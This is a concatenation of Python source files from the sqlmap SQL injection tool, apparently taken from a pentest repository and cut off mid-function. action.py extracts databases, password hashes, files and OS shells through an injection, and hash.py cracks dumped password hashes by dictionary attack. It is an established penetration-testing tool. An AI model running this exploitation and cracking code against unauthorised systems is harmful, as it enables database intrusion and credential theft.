kb.testedParams.add(paramKey) else: warnMsg = "%s parameter '%s' is not " % (place, parameter) warnMsg += "injectable" logger.warn(warnMsg) if len(kb.injections) == 0 or (len(kb.injections) == 1 and kb.injections[0].place is None): if kb.vainRun and not conf.multipleTargets: errMsg = "no parameter(s) found for testing in the provided data " errMsg += "(e.g. GET parameter 'id' in 'www.site.com/index.php?id=1')" raise SqlmapNoneDataException(errMsg) else: errMsg = "all tested parameters appear to be not injectable." if conf.level < 5 or conf.risk < 3: errMsg += " Try to increase '--level'/'--risk' values " errMsg += "to perform more tests." if isinstance(conf.tech, list) and len(conf.tech) < 5: errMsg += " Rerun without providing the option '--technique'." if not conf.textOnly and kb.originalPage: percent = (100.0 * len(getFilteredPageContent(kb.originalPage)) / len(kb.originalPage)) if kb.dynamicMarkings: errMsg += " You can give it a go with the switch '--text-only' " errMsg += "if the target page has a low percentage " errMsg += "of textual content (~%.2f%% of " % percent errMsg += "page content is text)." elif percent < LOW_TEXT_PERCENT and not kb.errorIsNone: errMsg += " Please retry with the switch '--text-only' " errMsg += "(along with --technique=BU) as this case " errMsg += "looks like a perfect candidate " errMsg += "(low textual content along with inability " errMsg += "of comparison engine to detect at least " errMsg += "one dynamic parameter)." if kb.heuristicTest == HEURISTIC_TEST.POSITIVE: errMsg += " As heuristic test turned out positive you are " errMsg += "strongly advised to continue on with the tests. " errMsg += "Please, consider usage of tampering scripts as " errMsg += "your target might filter the queries." if not conf.string and not conf.notString and not conf.regexp: errMsg += " Also, you can try to rerun by providing " errMsg += "either a valid value for option '--string' " errMsg += "(or '--regexp')" elif conf.string: errMsg += " Also, you can try to rerun by providing a " errMsg += "valid value for option '--string' as perhaps the string you " errMsg += "have chosen does not match " errMsg += "exclusively True responses" elif conf.regexp: errMsg += " Also, you can try to rerun by providing a " errMsg += "valid value for option '--regexp' as perhaps the regular " errMsg += "expression that you have chosen " errMsg += "does not match exclusively True responses" raise SqlmapNotVulnerableException(errMsg) else: # Flush the flag kb.testMode = False _saveToResultsFile() _saveToHashDB() _showInjections() _selectInjection() if kb.injection.place is not None and kb.injection.parameter is not None: if conf.multipleTargets: message = "do you want to exploit this SQL injection? [Y/n] " exploit = readInput(message, default="Y") condition = not exploit or exploit[0] in ("y", "Y") else: condition = True if condition: action() except KeyboardInterrupt: if conf.multipleTargets: warnMsg = "user aborted in multiple target mode" logger.warn(warnMsg) message = "do you want to skip to the next target in list? [Y/n/q]" test = readInput(message, default="Y") if not test or test[0] in ("y", "Y"): pass elif test[0] in ("n", "N"): return False elif test[0] in ("q", "Q"): raise SqlmapUserQuitException else: raise except SqlmapUserQuitException: raise except SqlmapSilentQuitException: raise except SqlmapBaseException, ex: errMsg = getUnicode(ex.message) if conf.multipleTargets: errMsg += ", skipping to the next %s" % ("form" if conf.forms else "URL") logger.error(errMsg) else: logger.critical(errMsg) return False finally: showHttpErrorCodes() if kb.maxConnectionsFlag: warnMsg = "it appears that the target " warnMsg += "has a maximum connections " warnMsg += "constraint" logger.warn(warnMsg) if kb.dataOutputFlag and not conf.multipleTargets: logger.info("fetched data logged to text files under '%s'" % conf.outputPath) if conf.multipleTargets and conf.resultsFilename: infoMsg = "you can find results of scanning in multiple targets " infoMsg += "mode inside the CSV file '%s'" % conf.resultsFilename logger.info(infoMsg) return True
27,843
Python
.py
512
38.705078
239
0.555098
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,975
__init__.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/controller/__init__.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ pass
150
Python
.py
6
23.666667
62
0.746479
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,976
action.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/controller/action.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ from lib.controller.handler import setHandler from lib.core.common import Backend from lib.core.common import Format from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.data import paths from lib.core.enums import CONTENT_TYPE from lib.core.exception import SqlmapNoneDataException from lib.core.exception import SqlmapUnsupportedDBMSException from lib.core.settings import SUPPORTED_DBMS from lib.techniques.brute.use import columnExists from lib.techniques.brute.use import tableExists def action(): """ This function exploit the SQL injection on the affected URL parameter and extract requested data from the back-end database management system or operating system if possible """ # First of all we have to identify the back-end database management # system to be able to go ahead with the injection setHandler() if not Backend.getDbms() or not conf.dbmsHandler: htmlParsed = Format.getErrorParsedDBMSes() errMsg = "sqlmap was not able to fingerprint the " errMsg += "back-end database management system" if htmlParsed: errMsg += ", but from the HTML error page it was " errMsg += "possible to determinate that the " errMsg += "back-end DBMS is %s" % htmlParsed if htmlParsed and htmlParsed.lower() in SUPPORTED_DBMS: errMsg += ". Do not specify the back-end DBMS manually, " errMsg += "sqlmap will fingerprint the DBMS for you" elif kb.nullConnection: errMsg += ". You can try to rerun without using optimization " errMsg += "switch '%s'" % ("-o" if conf.optimize else "--null-connection") else: errMsg += ". Support for this DBMS will be implemented at " errMsg += "some point" raise SqlmapUnsupportedDBMSException(errMsg) conf.dumper.singleString(conf.dbmsHandler.getFingerprint()) # Enumeration options if conf.getBanner: conf.dumper.banner(conf.dbmsHandler.getBanner()) if conf.getCurrentUser: conf.dumper.currentUser(conf.dbmsHandler.getCurrentUser()) if conf.getCurrentDb: conf.dumper.currentDb(conf.dbmsHandler.getCurrentDb()) if conf.getHostname: conf.dumper.hostname(conf.dbmsHandler.getHostname()) if conf.isDba: conf.dumper.dba(conf.dbmsHandler.isDba()) if conf.getUsers: conf.dumper.users(conf.dbmsHandler.getUsers()) if conf.getPasswordHashes: try: conf.dumper.userSettings("database management system users password hashes", conf.dbmsHandler.getPasswordHashes(), "password hash", CONTENT_TYPE.PASSWORDS) except SqlmapNoneDataException, ex: logger.critical(ex) except: raise if conf.getPrivileges: try: conf.dumper.userSettings("database management system users privileges", conf.dbmsHandler.getPrivileges(), "privilege", CONTENT_TYPE.PRIVILEGES) except SqlmapNoneDataException, ex: logger.critical(ex) except: raise if conf.getRoles: try: conf.dumper.userSettings("database management system users roles", conf.dbmsHandler.getRoles(), "role", CONTENT_TYPE.ROLES) except SqlmapNoneDataException, ex: logger.critical(ex) except: raise if conf.getDbs: conf.dumper.dbs(conf.dbmsHandler.getDbs()) if conf.getTables: conf.dumper.dbTables(conf.dbmsHandler.getTables()) if conf.commonTables: conf.dumper.dbTables(tableExists(paths.COMMON_TABLES)) if conf.getSchema: conf.dumper.dbTableColumns(conf.dbmsHandler.getSchema(), CONTENT_TYPE.SCHEMA) if conf.getColumns: conf.dumper.dbTableColumns(conf.dbmsHandler.getColumns(), CONTENT_TYPE.COLUMNS) if conf.getCount: conf.dumper.dbTablesCount(conf.dbmsHandler.getCount()) if conf.commonColumns: conf.dumper.dbTableColumns(columnExists(paths.COMMON_COLUMNS)) if conf.dumpTable: conf.dbmsHandler.dumpTable() if conf.dumpAll: conf.dbmsHandler.dumpAll() if conf.search: conf.dbmsHandler.search() if conf.query: conf.dumper.query(conf.query, conf.dbmsHandler.sqlQuery(conf.query)) if conf.sqlShell: conf.dbmsHandler.sqlShell() if conf.sqlFile: conf.dbmsHandler.sqlFile() # User-defined function options if conf.udfInject: conf.dbmsHandler.udfInjectCustom() # File system options if conf.rFile: conf.dumper.rFile(conf.dbmsHandler.readFile(conf.rFile)) if conf.wFile: conf.dbmsHandler.writeFile(conf.wFile, conf.dFile, conf.wFileType) # Operating system options if conf.osCmd: conf.dbmsHandler.osCmd() if conf.osShell: conf.dbmsHandler.osShell() if conf.osPwn: conf.dbmsHandler.osPwn() if conf.osSmb: conf.dbmsHandler.osSmb() if conf.osBof: conf.dbmsHandler.osBof() # Windows registry options if conf.regRead: conf.dumper.registerValue(conf.dbmsHandler.regRead()) if conf.regAdd: conf.dbmsHandler.regAdd() if conf.regDel: conf.dbmsHandler.regDel() # Miscellaneous options if conf.cleanup: conf.dbmsHandler.cleanup() if conf.direct: conf.dbmsConnector.close()
5,674
Python
.py
141
32.368794
114
0.685131
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,977
handler.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/controller/handler.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ from lib.core.common import Backend from lib.core.data import conf from lib.core.data import logger from lib.core.dicts import DBMS_DICT from lib.core.enums import DBMS from lib.core.settings import MSSQL_ALIASES from lib.core.settings import MYSQL_ALIASES from lib.core.settings import ORACLE_ALIASES from lib.core.settings import PGSQL_ALIASES from lib.core.settings import SQLITE_ALIASES from lib.core.settings import ACCESS_ALIASES from lib.core.settings import FIREBIRD_ALIASES from lib.core.settings import MAXDB_ALIASES from lib.core.settings import SYBASE_ALIASES from lib.core.settings import DB2_ALIASES from lib.core.settings import HSQLDB_ALIASES from lib.utils.sqlalchemy import SQLAlchemy from plugins.dbms.mssqlserver import MSSQLServerMap from plugins.dbms.mssqlserver.connector import Connector as MSSQLServerConn from plugins.dbms.mysql import MySQLMap from plugins.dbms.mysql.connector import Connector as MySQLConn from plugins.dbms.oracle import OracleMap from plugins.dbms.oracle.connector import Connector as OracleConn from plugins.dbms.postgresql import PostgreSQLMap from plugins.dbms.postgresql.connector import Connector as PostgreSQLConn from plugins.dbms.sqlite import SQLiteMap from plugins.dbms.sqlite.connector import Connector as SQLiteConn from plugins.dbms.access import AccessMap from plugins.dbms.access.connector import Connector as AccessConn from plugins.dbms.firebird import FirebirdMap from plugins.dbms.firebird.connector import Connector as FirebirdConn from plugins.dbms.maxdb import MaxDBMap from plugins.dbms.maxdb.connector import Connector as MaxDBConn from plugins.dbms.sybase import SybaseMap from plugins.dbms.sybase.connector import Connector as SybaseConn from plugins.dbms.db2 import DB2Map from plugins.dbms.db2.connector import Connector as DB2Conn from plugins.dbms.hsqldb import HSQLDBMap from plugins.dbms.hsqldb.connector import Connector as HSQLDBConn def setHandler(): """ Detect which is the target web application back-end database management system. """ items = [ (DBMS.MYSQL, MYSQL_ALIASES, MySQLMap, MySQLConn), (DBMS.ORACLE, ORACLE_ALIASES, OracleMap, OracleConn), (DBMS.PGSQL, PGSQL_ALIASES, PostgreSQLMap, PostgreSQLConn), (DBMS.MSSQL, MSSQL_ALIASES, MSSQLServerMap, MSSQLServerConn), (DBMS.SQLITE, SQLITE_ALIASES, SQLiteMap, SQLiteConn), (DBMS.ACCESS, ACCESS_ALIASES, AccessMap, AccessConn), (DBMS.FIREBIRD, FIREBIRD_ALIASES, FirebirdMap, FirebirdConn), (DBMS.MAXDB, MAXDB_ALIASES, MaxDBMap, MaxDBConn), (DBMS.SYBASE, SYBASE_ALIASES, SybaseMap, SybaseConn), (DBMS.DB2, DB2_ALIASES, DB2Map, DB2Conn), (DBMS.HSQLDB, HSQLDB_ALIASES, HSQLDBMap, HSQLDBConn), ] _ = max(_ if (Backend.getIdentifiedDbms() or "").lower() in _[1] else None for _ in items) if _: items.remove(_) items.insert(0, _) for dbms, aliases, Handler, Connector in items: if conf.dbms and conf.dbms.lower() != dbms.lower(): debugMsg = "skipping test for %s" % dbms logger.debug(debugMsg) continue handler = Handler() conf.dbmsConnector = Connector() if conf.direct: logger.debug("forcing timeout to 10 seconds") conf.timeout = 10 dialect = DBMS_DICT[dbms][3] if dialect: sqlalchemy = SQLAlchemy(dialect=dialect) sqlalchemy.connect() if sqlalchemy.connector: conf.dbmsConnector = sqlalchemy else: conf.dbmsConnector.connect() else: conf.dbmsConnector.connect() if handler.checkDbms(): conf.dbmsHandler = handler break else: conf.dbmsConnector = None # At this point back-end DBMS is correctly fingerprinted, no need # to enforce it anymore Backend.flushForcedDbms()
4,229
Python
.py
94
37.776596
94
0.714147
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,978
hashdb.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/utils/hashdb.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import hashlib import os import sqlite3 import threading import time from lib.core.common import getUnicode from lib.core.common import serializeObject from lib.core.common import unserializeObject from lib.core.data import logger from lib.core.exception import SqlmapDataException from lib.core.settings import HASHDB_END_TRANSACTION_RETRIES from lib.core.settings import HASHDB_FLUSH_RETRIES from lib.core.settings import HASHDB_FLUSH_THRESHOLD from lib.core.settings import UNICODE_ENCODING from lib.core.threads import getCurrentThreadData from lib.core.threads import getCurrentThreadName class HashDB(object): def __init__(self, filepath): self.filepath = filepath self._write_cache = {} self._cache_lock = threading.Lock() def _get_cursor(self): threadData = getCurrentThreadData() if threadData.hashDBCursor is None: try: connection = sqlite3.connect(self.filepath, timeout=3, isolation_level=None) threadData.hashDBCursor = connection.cursor() threadData.hashDBCursor.execute("CREATE TABLE IF NOT EXISTS storage (id INTEGER PRIMARY KEY, value TEXT)") except Exception, ex: errMsg = "error occurred while opening a session " errMsg += "file '%s' ('%s')" % (self.filepath, ex) raise SqlmapDataException(errMsg) return threadData.hashDBCursor def _set_cursor(self, cursor): threadData = getCurrentThreadData() threadData.hashDBCursor = cursor cursor = property(_get_cursor, _set_cursor) def close(self): threadData = getCurrentThreadData() try: if threadData.hashDBCursor: threadData.hashDBCursor.close() threadData.hashDBCursor.connection.close() threadData.hashDBCursor = None except: pass @staticmethod def hashKey(key): key = key.encode(UNICODE_ENCODING) if isinstance(key, unicode) else repr(key) retVal = int(hashlib.md5(key).hexdigest()[:12], 16) return retVal def retrieve(self, key, unserialize=False): retVal = None if key and (self._write_cache or os.path.isfile(self.filepath)): hash_ = HashDB.hashKey(key) retVal = self._write_cache.get(hash_) if not retVal: while True: try: for row in self.cursor.execute("SELECT value FROM storage WHERE id=?", (hash_,)): retVal = row[0] except sqlite3.OperationalError, ex: if not 'locked' in ex.message: raise else: break return retVal if not unserialize else unserializeObject(retVal) def write(self, key, value, serialize=False): if key: hash_ = HashDB.hashKey(key) self._cache_lock.acquire() self._write_cache[hash_] = getUnicode(value) if not serialize else serializeObject(value) self._cache_lock.release() if getCurrentThreadName() in ('0', 'MainThread'): self.flush() def flush(self, forced=False): if not self._write_cache: return if not forced and len(self._write_cache) < HASHDB_FLUSH_THRESHOLD: return self._cache_lock.acquire() _ = self._write_cache self._write_cache = {} self._cache_lock.release() try: self.beginTransaction() for hash_, value in _.items(): retries = 0 while True: try: try: self.cursor.execute("INSERT INTO storage VALUES (?, ?)", (hash_, value,)) except sqlite3.IntegrityError: self.cursor.execute("UPDATE storage SET value=? WHERE id=?", (value, hash_,)) except sqlite3.DatabaseError, ex: if not os.path.exists(self.filepath): debugMsg = "session file '%s' does not exist" % self.filepath logger.debug(debugMsg) break if retries == 0: warnMsg = "there has been a problem while writing to " warnMsg += "the session file ('%s')" % ex.message logger.warn(warnMsg) if retries >= HASHDB_FLUSH_RETRIES: return else: retries += 1 time.sleep(1) else: break finally: self.endTransaction() def beginTransaction(self): threadData = getCurrentThreadData() if not threadData.inTransaction: self.cursor.execute("BEGIN TRANSACTION") threadData.inTransaction = True def endTransaction(self): threadData = getCurrentThreadData() if threadData.inTransaction: retries = 0 while retries < HASHDB_END_TRANSACTION_RETRIES: try: self.cursor.execute("END TRANSACTION") threadData.inTransaction = False except sqlite3.OperationalError: pass else: return retries += 1 time.sleep(1) try: self.cursor.execute("ROLLBACK TRANSACTION") except sqlite3.OperationalError: self.cursor.close() self.cursor = None finally: threadData.inTransaction = False
6,001
Python
.py
143
28.741259
122
0.564278
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,979
hash.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/utils/hash.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ try: from crypt import crypt except ImportError: from thirdparty.fcrypt.fcrypt import crypt _multiprocessing = None try: import multiprocessing # problems on FreeBSD (Reference: http://www.eggheadcafe.com/microsoft/Python/35880259/multiprocessing-on-freebsd.aspx) _ = multiprocessing.Queue() except (ImportError, OSError): pass else: _multiprocessing = multiprocessing import gc import os import re import tempfile import time from hashlib import md5 from hashlib import sha1 from hashlib import sha224 from hashlib import sha384 from hashlib import sha512 from Queue import Queue from lib.core.common import Backend from lib.core.common import checkFile from lib.core.common import clearConsoleLine from lib.core.common import dataToStdout from lib.core.common import getFileItems from lib.core.common import getPublicTypeMembers from lib.core.common import hashDBRetrieve from lib.core.common import hashDBWrite from lib.core.common import normalizeUnicode from lib.core.common import paths from lib.core.common import readInput from lib.core.common import singleTimeLogMessage from lib.core.common import singleTimeWarnMessage from lib.core.convert import hexdecode from lib.core.convert import hexencode from lib.core.convert import utf8encode from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.enums import DBMS from lib.core.enums import HASH from lib.core.exception import SqlmapFilePathException from lib.core.exception import SqlmapUserQuitException from lib.core.settings import COMMON_PASSWORD_SUFFIXES from lib.core.settings import COMMON_USER_COLUMNS from lib.core.settings import DUMMY_USER_PREFIX from lib.core.settings import HASH_MOD_ITEM_DISPLAY from lib.core.settings import HASH_RECOGNITION_QUIT_THRESHOLD from lib.core.settings import IS_WIN from lib.core.settings import ITOA64 from lib.core.settings import ML from lib.core.settings import NULL from lib.core.settings import UNICODE_ENCODING from lib.core.settings import ROTATING_CHARS from lib.core.wordlist import Wordlist from thirdparty.pydes.pyDes import des from thirdparty.pydes.pyDes import CBC def mysql_passwd(password, uppercase=True): """ Reference(s): http://csl.sublevel3.org/mysql-password-function/ >>> mysql_passwd(password='testpass', uppercase=True) '*00E247AC5F9AF26AE0194B41E1E769DEE1429A29' """ retVal = "*%s" % sha1(sha1(password).digest()).hexdigest() return retVal.upper() if uppercase else retVal.lower() def mysql_old_passwd(password, uppercase=True): # prior to version '4.1' """ Reference(s): http://www.sfr-fresh.com/unix/privat/tpop3d-1.5.5.tar.gz:a/tpop3d-1.5.5/password.c http://voidnetwork.org/5ynL0rd/darkc0de/python_script/darkMySQLi.html >>> mysql_old_passwd(password='testpass', uppercase=True) '7DCDA0D57290B453' """ a, b, c = 1345345333, 7, 0x12345671 for d in password: if d == ' ' or d == '\t': continue e = ord(d) a ^= (((a & 63) + b) * e) + (a << 8) c += (c << 8) ^ a b += e retVal = "%08lx%08lx" % (a & ((1 << 31) - 1), c & ((1 << 31) - 1)) return retVal.upper() if uppercase else retVal.lower() def postgres_passwd(password, username, uppercase=False): """ Reference(s): http://pentestmonkey.net/blog/cracking-postgres-hashes/ >>> postgres_passwd(password='testpass', username='testuser', uppercase=False) 'md599e5ea7a6f7c3269995cba3927fd0093' """ retVal = "md5%s" % md5(password + username).hexdigest() return retVal.upper() if uppercase else retVal.lower() def mssql_passwd(password, salt, uppercase=False): """ Reference(s): http://www.leidecker.info/projects/phrasendrescher/mssql.c https://www.evilfingers.com/tools/GSAuditor.php >>> mssql_passwd(password='testpass', salt='4086ceb6', uppercase=False) '0x01004086ceb60c90646a8ab9889fe3ed8e5c150b5460ece8425a' """ binsalt = hexdecode(salt) unistr = "".join(map(lambda c: ("%s\0" if ord(c) < 256 else "%s") % utf8encode(c), password)) retVal = "0100%s%s" % (salt, sha1(unistr + binsalt).hexdigest()) return "0x%s" % (retVal.upper() if uppercase else retVal.lower()) def mssql_old_passwd(password, salt, uppercase=True): # prior to version '2005' """ Reference(s): www.exploit-db.com/download_pdf/15537/ http://www.leidecker.info/projects/phrasendrescher/mssql.c https://www.evilfingers.com/tools/GSAuditor.php >>> mssql_old_passwd(password='testpass', salt='4086ceb6', uppercase=True) '0x01004086CEB60C90646A8AB9889FE3ED8E5C150B5460ECE8425AC7BB7255C0C81D79AA5D0E93D4BB077FB9A51DA0' """ binsalt = hexdecode(salt) unistr = "".join(map(lambda c: ("%s\0" if ord(c) < 256 else "%s") % utf8encode(c), password)) retVal = "0100%s%s%s" % (salt, sha1(unistr + binsalt).hexdigest(), sha1(unistr.upper() + binsalt).hexdigest()) return "0x%s" % (retVal.upper() if uppercase else retVal.lower()) def mssql_new_passwd(password, salt, uppercase=False): """ Reference(s): http://hashcat.net/forum/thread-1474.html >>> mssql_new_passwd(password='testpass', salt='4086ceb6', uppercase=False) '0x02004086ceb6eb051cdbc5bdae68ffc66c918d4977e592f6bdfc2b444a7214f71fa31c35902c5b7ae773ed5f4c50676d329120ace32ee6bc81c24f70711eb0fc6400e85ebf25' """ binsalt = hexdecode(salt) unistr = "".join(map(lambda c: ("%s\0" if ord(c) < 256 else "%s") % utf8encode(c), password)) retVal = "0200%s%s" % (salt, sha512(unistr + binsalt).hexdigest()) return "0x%s" % (retVal.upper() if uppercase else retVal.lower()) def oracle_passwd(password, salt, uppercase=True): """ Reference(s): https://www.evilfingers.com/tools/GSAuditor.php http://www.notesbit.com/index.php/scripts-oracle/oracle-11g-new-password-algorithm-is-revealed-by-seclistsorg/ http://seclists.org/bugtraq/2007/Sep/304 >>> oracle_passwd(password='SHAlala', salt='1B7B5F82B7235E9E182C', uppercase=True) 'S:2BFCFDF5895014EE9BB2B9BA067B01E0389BB5711B7B5F82B7235E9E182C' """ binsalt = hexdecode(salt) retVal = "s:%s%s" % (sha1(utf8encode(password) + binsalt).hexdigest(), salt) return retVal.upper() if uppercase else retVal.lower() def oracle_old_passwd(password, username, uppercase=True): # prior to version '11g' """ Reference(s): http://www.notesbit.com/index.php/scripts-oracle/oracle-11g-new-password-algorithm-is-revealed-by-seclistsorg/ >>> oracle_old_passwd(password='tiger', username='scott', uppercase=True) 'F894844C34402B67' """ IV, pad = "\0" * 8, "\0" if isinstance(username, unicode): username = unicode.encode(username, UNICODE_ENCODING) # pyDes has issues with unicode strings unistr = "".join("\0%s" % c for c in (username + password).upper()) cipher = des(hexdecode("0123456789ABCDEF"), CBC, IV, pad) encrypted = cipher.encrypt(unistr) cipher = des(encrypted[-8:], CBC, IV, pad) encrypted = cipher.encrypt(unistr) retVal = hexencode(encrypted[-8:]) return retVal.upper() if uppercase else retVal.lower() def md5_generic_passwd(password, uppercase=False): """ >>> md5_generic_passwd(password='testpass', uppercase=False) '179ad45c6ce2cb97cf1029e212046e81' """ retVal = md5(password).hexdigest() return retVal.upper() if uppercase else retVal.lower() def sha1_generic_passwd(password, uppercase=False): """ >>> sha1_generic_passwd(password='testpass', uppercase=False) '206c80413b9a96c1312cc346b7d2517b84463edd' """ retVal = sha1(password).hexdigest() return retVal.upper() if uppercase else retVal.lower() def sha224_generic_passwd(password, uppercase=False): """ >>> sha224_generic_passwd(password='testpass', uppercase=False) '648db6019764b598f75ab6b7616d2e82563a00eb1531680e19ac4c6f' """ retVal = sha224(password).hexdigest() return retVal.upper() if uppercase else retVal.lower() def sha384_generic_passwd(password, uppercase=False): """ >>> sha384_generic_passwd(password='testpass', uppercase=False) '6823546e56adf46849343be991d4b1be9b432e42ed1b4bb90635a0e4b930e49b9ca007bc3e04bf0a4e0df6f1f82769bf' """ retVal = sha384(password).hexdigest() return retVal.upper() if uppercase else retVal.lower() def sha512_generic_passwd(password, uppercase=False): """ >>> sha512_generic_passwd(password='testpass', uppercase=False) '78ddc8555bb1677ff5af75ba5fc02cb30bb592b0610277ae15055e189b77fe3fda496e5027a3d99ec85d54941adee1cc174b50438fdc21d82d0a79f85b58cf44' """ retVal = sha512(password).hexdigest() return retVal.upper() if uppercase else retVal.lower() def crypt_generic_passwd(password, salt, uppercase=False): """ Reference(s): http://docs.python.org/library/crypt.html http://helpful.knobs-dials.com/index.php/Hashing_notes http://php.net/manual/en/function.crypt.php http://carey.geek.nz/code/python-fcrypt/ >>> crypt_generic_passwd(password='rasmuslerdorf', salt='rl', uppercase=False) 'rl.3StKT.4T8M' """ retVal = crypt(password, salt) return retVal.upper() if uppercase else retVal def wordpress_passwd(password, salt, count, prefix, uppercase=False): """ Reference(s): http://packetstormsecurity.org/files/74448/phpassbrute.py.txt http://scriptserver.mainframe8.com/wordpress_password_hasher.php >>> wordpress_passwd(password='testpass', salt='aD9ZLmkp', count=2048, prefix='$P$9aD9ZLmkp', uppercase=False) '$P$9aD9ZLmkpsN4A83G8MefaaP888gVKX0' """ def _encode64(input_, count): output = '' i = 0 while i < count: value = ord(input_[i]) i += 1 output = output + ITOA64[value & 0x3f] if i < count: value = value | (ord(input_[i]) << 8) output = output + ITOA64[(value >> 6) & 0x3f] i += 1 if i >= count: break if i < count: value = value | (ord(input_[i]) << 16) output = output + ITOA64[(value >> 12) & 0x3f] i += 1 if i >= count: break output = output + ITOA64[(value >> 18) & 0x3f] return output cipher = md5(salt) cipher.update(password) hash_ = cipher.digest() for i in xrange(count): _ = md5(hash_) _.update(password) hash_ = _.digest() retVal = prefix + _encode64(hash_, 16) return retVal.upper() if uppercase else retVal __functions__ = { HASH.MYSQL: mysql_passwd, HASH.MYSQL_OLD: mysql_old_passwd, HASH.POSTGRES: postgres_passwd, HASH.MSSQL: mssql_passwd, HASH.MSSQL_OLD: mssql_old_passwd, HASH.MSSQL_NEW: mssql_new_passwd, HASH.ORACLE: oracle_passwd, HASH.ORACLE_OLD: oracle_old_passwd, HASH.MD5_GENERIC: md5_generic_passwd, HASH.SHA1_GENERIC: sha1_generic_passwd, HASH.SHA224_GENERIC: sha224_generic_passwd, HASH.SHA384_GENERIC: sha384_generic_passwd, HASH.SHA512_GENERIC: sha512_generic_passwd, HASH.CRYPT_GENERIC: crypt_generic_passwd, HASH.WORDPRESS: wordpress_passwd, } def storeHashesToFile(attack_dict): if not attack_dict: return if kb.storeHashesChoice is None: message = "do you want to store hashes to a temporary file " message += "for eventual further processing with other tools [y/N] " test = readInput(message, default="N") kb.storeHashesChoice = test[0] in ("y", "Y") if not kb.storeHashesChoice: return handle, filename = tempfile.mkstemp(prefix="sqlmaphashes-", suffix=".txt") os.close(handle) infoMsg = "writing hashes to a temporary file '%s' " % filename logger.info(infoMsg) items = set() with open(filename, "w+") as f: for user, hashes in attack_dict.items(): for hash_ in hashes: hash_ = hash_.split()[0] if hash_ and hash_.strip() else hash_ if hash_ and hash_ != NULL and hashRecognition(hash_): item = None if user and not user.startswith(DUMMY_USER_PREFIX): item = "%s:%s\n" % (user.encode(UNICODE_ENCODING), hash_.encode(UNICODE_ENCODING)) else: item = "%s\n" % hash_.encode(UNICODE_ENCODING) if item and item not in items: f.write(item) items.add(item) def attackCachedUsersPasswords(): if kb.data.cachedUsersPasswords: results = dictionaryAttack(kb.data.cachedUsersPasswords) lut = {} for (_, hash_, password) in results: lut[hash_.lower()] = password for user in kb.data.cachedUsersPasswords.keys(): for i in xrange(len(kb.data.cachedUsersPasswords[user])): value = kb.data.cachedUsersPasswords[user][i].lower().split()[0] if value in lut: kb.data.cachedUsersPasswords[user][i] += "%s clear-text password: %s" % ('\n' if kb.data.cachedUsersPasswords[user][i][-1] != '\n' else '', lut[value]) def attackDumpedTable(): if kb.data.dumpedTable: table = kb.data.dumpedTable columns = table.keys() count = table["__infos__"]["count"] if not count: return infoMsg = "analyzing table dump for possible password hashes" logger.info(infoMsg) found = False col_user = '' col_passwords = set() attack_dict = {} for column in columns: if column and column.lower() in COMMON_USER_COLUMNS: col_user = column break for i in xrange(count): if not found and i > HASH_RECOGNITION_QUIT_THRESHOLD: break for column in columns: if column == col_user or column == '__infos__': continue if len(table[column]['values']) <= i: continue value = table[column]['values'][i] if hashRecognition(value): found = True if col_user and i < len(table[col_user]['values']): if table[col_user]['values'][i] not in attack_dict: attack_dict[table[col_user]['values'][i]] = [] attack_dict[table[col_user]['values'][i]].append(value) else: attack_dict['%s%d' % (DUMMY_USER_PREFIX, i)] = [value] col_passwords.add(column) if attack_dict: infoMsg = "recognized possible password hashes in column%s " % ("s" if len(col_passwords) > 1 else "") infoMsg += "'%s'" % ", ".join(col for col in col_passwords) logger.info(infoMsg) storeHashesToFile(attack_dict) message = "do you want to crack them via a dictionary-based attack? %s" % ("[y/N/q]" if conf.multipleTargets else "[Y/n/q]") test = readInput(message, default="N" if conf.multipleTargets else "Y") if test[0] in ("n", "N"): return elif test[0] in ("q", "Q"): raise SqlmapUserQuitException results = dictionaryAttack(attack_dict) lut = dict() for (_, hash_, password) in results: if hash_: lut[hash_.lower()] = password infoMsg = "postprocessing table dump" logger.info(infoMsg) for i in xrange(count): for column in columns: if not (column == col_user or column == '__infos__' or len(table[column]['values']) <= i): value = table[column]['values'][i] if value and value.lower() in lut: table[column]['values'][i] += " (%s)" % lut[value.lower()] table[column]['length'] = max(table[column]['length'], len(table[column]['values'][i])) def hashRecognition(value): retVal = None isOracle, isMySQL = Backend.isDbms(DBMS.ORACLE), Backend.isDbms(DBMS.MYSQL) if isinstance(value, basestring): for name, regex in getPublicTypeMembers(HASH): # Hashes for Oracle and old MySQL look the same hence these checks if isOracle and regex == HASH.MYSQL_OLD: continue elif isMySQL and regex == HASH.ORACLE_OLD: continue elif regex == HASH.CRYPT_GENERIC: if any((value.lower() == value, value.upper() == value)): continue elif re.match(regex, value): retVal = regex break return retVal def _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, proc_id, proc_count, wordlists, custom_wordlist): count = 0 rotator = 0 hashes = set([item[0][1] for item in attack_info]) wordlist = Wordlist(wordlists, proc_id, getattr(proc_count, "value", 0), custom_wordlist) try: for word in wordlist: if not attack_info: break if not isinstance(word, basestring): continue if suffix: word = word + suffix try: 